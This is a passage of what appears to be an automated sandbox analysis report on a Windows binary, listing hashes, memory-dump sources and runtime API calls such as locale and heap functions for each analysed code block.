                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5f01d4543bc709305ee5daf495badc9bfac8ad4ea20d7dcaf2c558d67c3d5550
                                                                                                          • Instruction ID: 708fdd4e785b230a818ff6d71e6b20e396190cc5ddbe630bfeab16cb03af5c2d
                                                                                                          • Opcode Fuzzy Hash: 5f01d4543bc709305ee5daf495badc9bfac8ad4ea20d7dcaf2c558d67c3d5550
                                                                                                          • Instruction Fuzzy Hash: AD01B5332002159F9F128E6CFC50A9637A9FBC5721F248224FB048B1D4DA39E8C19BD5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalLeaveSection
                                                                                                          • String ID:
                                                                                                          • API String ID: 3988221542-0
                                                                                                          • Opcode ID: 9a284ff02e7f5eda972615e006501344b04785a46526e8b30b500298aa56e5bc
                                                                                                          • Instruction ID: e33ee664baa03501cf0237a7492dcbd5ab4b7fdfb49990b97d2a812786a07b9a
                                                                                                          • Opcode Fuzzy Hash: 9a284ff02e7f5eda972615e006501344b04785a46526e8b30b500298aa56e5bc
                                                                                                          • Instruction Fuzzy Hash: 790126B7708242DBCB259B7CE869BA8BBD4BF41338F20836FE042954C1CB2A5A10C350
                                                                                                          APIs
                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,?,?,007022A9,?,?,006F3E32,00001000,?,006F3D7A), ref: 007131F3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocateHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 1279760036-0
                                                                                                          • Opcode ID: 6d0f9d1685e8924f6550eeb25a2b1d9016a75dabd10cd8b4141e12fee5556998
                                                                                                          • Instruction ID: 082b48ae19fa0b912a5fe536c7f9c04f3b0103a6b79955b22b92f64441ad3c04
                                                                                                          • Opcode Fuzzy Hash: 6d0f9d1685e8924f6550eeb25a2b1d9016a75dabd10cd8b4141e12fee5556998
                                                                                                          • Instruction Fuzzy Hash: 80E0E531100A29F7EB312669CC05BDB768CAB027A0F100220ED09960D1CE6DCE85A1E5
                                                                                                          APIs
                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 007008F1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Concurrency::cancel_current_task
                                                                                                          • String ID:
                                                                                                          • API String ID: 118556049-0
                                                                                                          • Opcode ID: 238d24ba721e6323cc6bf01d29c27b2a15ce58c99b8b4b94d52b965bb8bb163e
                                                                                                          • Instruction ID: 977bf36921b671a57bc41abc509eb4bc4be1de7b4721ba27f945d21d050d5d86
                                                                                                          • Opcode Fuzzy Hash: 238d24ba721e6323cc6bf01d29c27b2a15ce58c99b8b4b94d52b965bb8bb163e
                                                                                                          • Instruction Fuzzy Hash: 60E01230C0020CEBCB44EBA4D1495ADBBB5AE80320F1081A9E849A7392DB39AE54CB85
                                                                                                          APIs
                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 006FBDD1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Concurrency::cancel_current_task
                                                                                                          • String ID:
                                                                                                          • API String ID: 118556049-0
                                                                                                          • Opcode ID: a30ae68e049c7e956b783bb4e37629f1f29edf683a27e5578c88f21e457d13c9
                                                                                                          • Instruction ID: 2c468dcd6a47b3c6bc237f1261d2d6febadad33c4159cc49a03e862efb07cbaa
                                                                                                          • Opcode Fuzzy Hash: a30ae68e049c7e956b783bb4e37629f1f29edf683a27e5578c88f21e457d13c9
                                                                                                          • Instruction Fuzzy Hash: C8E04630C0020CEBCB44FBA4E1494ACBBB6AF84304F1080ADEA4967352DB31AE01CF86
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __floor_pentium4
                                                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                          • API String ID: 4168288129-2761157908
                                                                                                          • Opcode ID: 1447b2eba109047aa95ba83af16117281ed49386415704d8d7c8fb2c0f0aff18
                                                                                                          • Instruction ID: 0cc8e531a7e131dede222840359f951dca726157a72215f9298470269cdd8892
                                                                                                          • Opcode Fuzzy Hash: 1447b2eba109047aa95ba83af16117281ed49386415704d8d7c8fb2c0f0aff18
                                                                                                          • Instruction Fuzzy Hash: E4D22871E082298FDB64CE28DD447EAB7B5EB44305F1441EAD84DE7281E778AEC58F81
                                                                                                          APIs
                                                                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,00718515,00000002,00000000,?,?,?,00718515,?,00000000), ref: 00718BDD
                                                                                                          • GetLocaleInfoW.KERNEL32(?,20001004,00718515,00000002,00000000,?,?,?,00718515,?,00000000), ref: 00718C06
                                                                                                          • GetACP.KERNEL32(?,?,00718515,?,00000000), ref: 00718C1B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InfoLocale
                                                                                                          • String ID: ACP$OCP
                                                                                                          • API String ID: 2299586839-711371036
                                                                                                          • Opcode ID: 94f138b75d630d16067f78f7ccb9991025a6ab521358c64d4211fd93296a1692
                                                                                                          • Instruction ID: 71c8ebbc57582fb01e2688baa69545a6fac356f0138d082339122bdd17c84393
                                                                                                          • Opcode Fuzzy Hash: 94f138b75d630d16067f78f7ccb9991025a6ab521358c64d4211fd93296a1692
                                                                                                          • Instruction Fuzzy Hash: A321C8E2705100EADBB08F5CC941AD773A7EF54B60B568465E909D7180EF3ADEC1D3A1
                                                                                                          APIs
                                                                                                            • Part of subcall function 00713413: GetLastError.KERNEL32(00000000,?,00715749), ref: 00713417
                                                                                                            • Part of subcall function 00713413: SetLastError.KERNEL32(00000000,?,?,00000028,0070F7C9), ref: 007134B9
                                                                                                          • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 007184E7
                                                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 00718525
                                                                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 00718538
                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00718580
                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0071859B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                          • String ID:
                                                                                                          • API String ID: 415426439-0
                                                                                                          • Opcode ID: 35186f5f226fe83bfbe87283f94b34fee7a06e8fc5186bd9c839996057cc0a1f
                                                                                                          • Instruction ID: c37e417dcd0bcd9122443a1a5cd71c1581af3c72d7ba7c09aaf14673aa8f704e
                                                                                                          • Opcode Fuzzy Hash: 35186f5f226fe83bfbe87283f94b34fee7a06e8fc5186bd9c839996057cc0a1f
                                                                                                          • Instruction Fuzzy Hash: 9D516071900246ABDB60DFA8DC45AFE77B9FF08700F144469E915E71D0EF789A80CB62
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e210328f8d4f359fac80214519e11883391db29b0651a67b32ed7d6b3dc8e133
                                                                                                          • Instruction ID: 8a82c7908ac643e785245b455b7d014d32c89a4dd77e46984c73183db909c5d2
                                                                                                          • Opcode Fuzzy Hash: e210328f8d4f359fac80214519e11883391db29b0651a67b32ed7d6b3dc8e133
                                                                                                          • Instruction Fuzzy Hash: 8D022B71E012199BDF14CFADD8806EEBBF1FF48314F648269DA15AB381D735AA41CB90
                                                                                                          APIs
                                                                                                          • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 00719216
                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0071930A
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00719349
                                                                                                          • FindClose.KERNEL32(00000000), ref: 0071937C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$CloseFile$FirstNext
                                                                                                          • String ID:
                                                                                                          • API String ID: 1164774033-0
                                                                                                          • Opcode ID: d6d3f1421eda75ac8929441e21d47f70e643bb0b544338b12bc66637d4507d3b
                                                                                                          • Instruction ID: c0be63dfb6a4b8c12b1e655d43b8cd8e17ce6f82934873bd59847b515c3457c6
                                                                                                          • Opcode Fuzzy Hash: d6d3f1421eda75ac8929441e21d47f70e643bb0b544338b12bc66637d4507d3b
                                                                                                          • Instruction Fuzzy Hash: 7B711571C0415DAFDF20AF2C8CADAFAB7B9AB05300F1441D9E15D97291DA399EC29F14
                                                                                                          APIs
                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00706534
                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 00706600
                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00706619
                                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00706623
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                          • String ID:
                                                                                                          • API String ID: 254469556-0
                                                                                                          • Opcode ID: 78175d207d574091934a7592aa1e842fcd458cb9563c0b0ff874f39b307ac418
                                                                                                          • Instruction ID: 60aed01625e13709d38a3d8480c7bef8ced1dbc0eed13e12807bfa5d5dfc11fc
                                                                                                          • Opcode Fuzzy Hash: 78175d207d574091934a7592aa1e842fcd458cb9563c0b0ff874f39b307ac418
                                                                                                          • Instruction Fuzzy Hash: C531F6B5D01228DBDB20DFA4D9497CDBBF8BF08304F1041AAE40CAB290EB759A85CF45
                                                                                                          APIs
                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00707122
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00707131
                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 0070713A
                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 00707147
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 2933794660-0
                                                                                                          • Opcode ID: 1ca631b08941f6e611e4c5c0a8f35fae09088aaf9a4e50f2b2c354fb56ec46ad
                                                                                                          • Instruction ID: cc8fd1b6191f6dfe60357389f2a8085f48c15b0e831928cf8186e94ae8f9a47d
                                                                                                          • Opcode Fuzzy Hash: 1ca631b08941f6e611e4c5c0a8f35fae09088aaf9a4e50f2b2c354fb56ec46ad
                                                                                                          • Instruction Fuzzy Hash: 00F0B270C0020DEBCB14DBF4CA8899EBBF4EF1D200B918595A412F7110E734AB458B50
                                                                                                          APIs
                                                                                                            • Part of subcall function 00713413: GetLastError.KERNEL32(00000000,?,00715749), ref: 00713417
                                                                                                            • Part of subcall function 00713413: SetLastError.KERNEL32(00000000,?,?,00000028,0070F7C9), ref: 007134B9
                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0071871F
                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00718769
                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0071882F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InfoLocale$ErrorLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 661929714-0
                                                                                                          • Opcode ID: d35c2297e83fb05a775c9592bc4e00488556b1ae01955623cab1d7acf657e87e
                                                                                                          • Instruction ID: ce566433f762a6056b9d67a31e3cf4876f06b6ee2e0c75ac0ee7b13f1fb61ee3
                                                                                                          • Opcode Fuzzy Hash: d35c2297e83fb05a775c9592bc4e00488556b1ae01955623cab1d7acf657e87e
                                                                                                          • Instruction Fuzzy Hash: 69618C71A102179BDB689F2CCC86BEA77A9EF04300F5441B9E915C62C1EB78DAC1CB51
                                                                                                          APIs
                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0070F3A8
                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0070F3B2
                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0070F3BF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                          • String ID:
                                                                                                          • API String ID: 3906539128-0
                                                                                                          • Opcode ID: 86e3c4d615212208485e4aea71ea94099dfefd3079c86c9f48e02bcff8bf57e6
                                                                                                          • Instruction ID: 16a8cd9e88f38f479ea972437f8e271d0d8d7a1dcd323fc7924e15de46e368e4
                                                                                                          • Opcode Fuzzy Hash: 86e3c4d615212208485e4aea71ea94099dfefd3079c86c9f48e02bcff8bf57e6
                                                                                                          • Instruction Fuzzy Hash: 2F319075911228DBCB21DF64D889B9DBBF8BF08310F5082EAE41CA6291E7749B85CF44
                                                                                                          APIs
                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,0070E2A3,?,20001004,00000000,00000002,?,?,0070D1B5), ref: 00713EE0
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InfoLocale
                                                                                                          • String ID: &p
                                                                                                          • API String ID: 2299586839-2011850372
                                                                                                          • Opcode ID: b5a347e5666714d4735767ecae2363cafee32660c17dda1e691f5584c8cf1947
                                                                                                          • Instruction ID: 8c49f18784200eb1487853a168e60ff4d69e22d54ba119e3404c993c09ac80ae
                                                                                                          • Opcode Fuzzy Hash: b5a347e5666714d4735767ecae2363cafee32660c17dda1e691f5584c8cf1947
                                                                                                          • Instruction Fuzzy Hash: 48E04F31500218FBCF326F65DC08AEE3E56EF487A0F144411FD09662A0CB3ECE61AB94
                                                                                                          APIs
                                                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0071CCF2,?,?,00000008,?,?,0072318B,00000000), ref: 0071CFC4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
